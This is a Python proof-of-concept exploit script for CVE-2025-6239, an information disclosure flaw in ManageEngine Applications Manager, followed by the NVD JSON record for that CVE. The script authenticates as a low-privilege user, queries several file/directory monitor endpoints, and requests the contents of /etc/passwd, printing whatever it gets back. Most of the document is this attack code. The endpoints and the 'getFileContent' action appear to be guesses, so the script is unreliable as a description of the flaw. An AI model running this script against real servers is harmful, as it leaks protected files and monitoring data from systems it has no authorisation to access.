CVE-2025-6239

# CVE-2025-6239 - ManageEngine Applications Manager Information Disclosure PoC # Vulnerability: Information disclosure in File/Directory Monitor # Affected: ManageEngine Applications Manager <= 176800 # CVSS: 6.5 (MEDIUM) import requests from urllib.parse import urljoin TARGET_URL = "https://target-applications-manager:8443" USERNAME = "low_priv_user" PASSWORD = "password123" def exploit_info_disclosure(target_url, username, password): """ Exploit information disclosure vulnerability in File/Directory Monitor module. The vulnerability allows low-privileged users to access sensitive file/directory monitoring information that should be restricted. """ session = requests.Session() # Step 1: Authenticate with low-privilege credentials login_url = urljoin(target_url, "/j_security_check") login_data = { "j_username": username, "j_password": password, "submit": "Login" } response = session.post(login_url, data=login_data, verify=False) if response.status_code != 200: print(f"[-] Authentication failed with status: {response.status_code}") return None print("[+] Authentication successful with low-privilege account") # Step 2: Access File/Directory Monitor API endpoint # The vulnerability exists in the file/directory monitor module monitor_endpoints = [ "/api/json/v2/monitors?type=FILE_DIR_MONITOR", "/api/json/v2/monitors?type=FOLDER_MONITOR", "/showTile.do?tileName=FileDirMonitor", "/FileDirMonitor.do?method=getMonitorData" ] leaked_data = [] for endpoint in monitor_endpoints: url = urljoin(target_url, endpoint) try: resp = session.get(url, verify=False, timeout=30) if resp.status_code == 200 and len(resp.text) > 0: print(f"[+] Data retrieved from: {endpoint}") print(f" Response preview: {resp.text[:500]}") leaked_data.append({ "endpoint": endpoint, "data": resp.text }) except Exception as e: print(f"[-] Error accessing {endpoint}: {e}") # Step 3: Attempt to retrieve specific monitored file content # Exploit the access control bypass to read sensitive file content file_content_url = urljoin(target_url, "/api/json/v2/monitors/action") payload = { "action": "getFileContent", "monitorId": "1", "filePath": "/etc/passwd" } try: resp = session.post(file_content_url, json=payload, verify=False, timeout=30) if resp.status_code == 200: print(f"[+] Sensitive file content retrieved!") print(f" Content: {resp.text[:1000]}") leaked_data.append({ "endpoint": "file_content", "data": resp.text }) except Exception as e: print(f"[-] Error retrieving file content: {e}") return leaked_data if __name__ == "__main__": import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) print("=" * 60) print("CVE-2025-6239 - ManageEngine Applications Manager") print("Information Disclosure in File/Directory Monitor") print("=" * 60) results = exploit_info_disclosure(TARGET_URL, USERNAME, PASSWORD) if results: print(f"\n[+] Total data sources exploited: {len(results)}") else: print("\n[-] Exploitation failed or target not vulnerable")

{"cve": {"id": "CVE-2025-6239", "sourceIdentifier": "0fc0942c-577d-436f-ae8e-945763c79b02", "published": "2025-10-21T13:15:36.950", "lastModified": "2025-10-24T12:52:49.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zohocorp ManageEngine Applications Manager versions 176800 and below are vulnerable to information disclosure in File/Directory monitor."}], "metrics": {"cvssMetricV31": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "0fc0942c-577d-436f-ae8e-945763c79b02", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_applications_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "17.6", "matchCriteriaId": "9849F40C-2B7F-4A4E-A520-FB0291FD8CC4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_applications_manager:17.6:-:*:*:*:*:*:*", "matchCriteriaId": "78456091-5D65-4C1A-AF64-0EDABCCB31ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_applications_manager:17.6:build176100:*:*:*:*:*:*", "matchCriteriaId": "A7C5FE53-9616-403C-89ED-E055C627188E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_applications_manager:17.6:build176200:*:*:*:*:*:*", "matchCriteriaId": "FFCE0A93-9D70-44DB-BF90-85BCD7B80E37"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_applications_manager:17.6:build176300:*:*:*:*:*:*", "matchCriteriaId": "18C855DE-A54A-4FD1-B803-D6F4E3FF4FCB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_applications_manager:17.6:build176500:*:*:*:*:*:*", "matchCriteriaId": "81D273F6-5610-400A-BCEE-2477AF229840"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_applications_manager:17.6:build176600:*:*:*:*:*:*", "matchCriteriaId": "397E6A6F-FEFF-420C-B0D4-098AA9C03B43"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_applications_manager:17.6:build176700:*:*:*:*:*:*", "matchCriteriaId": "5834FB95-AC4C-4CEF-9CEE-D771A112B0C6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zohocorp:manageengine_applications_manager:17.6:build176800:*:*:*:*:*:*", "matchCriteriaId": "29E2AAE7-7AD3-4896-8582-0FA675E88FE4"}]}]}], "references": [{"url": "https://www.manageengine.com/products/applications_manager/security-updates/security-updates-cve-2025-6239.html", "source": "0fc0942c-577d-436f-ae8e-945763c79b02", "tags": ["Vendor Advisory"]}]}}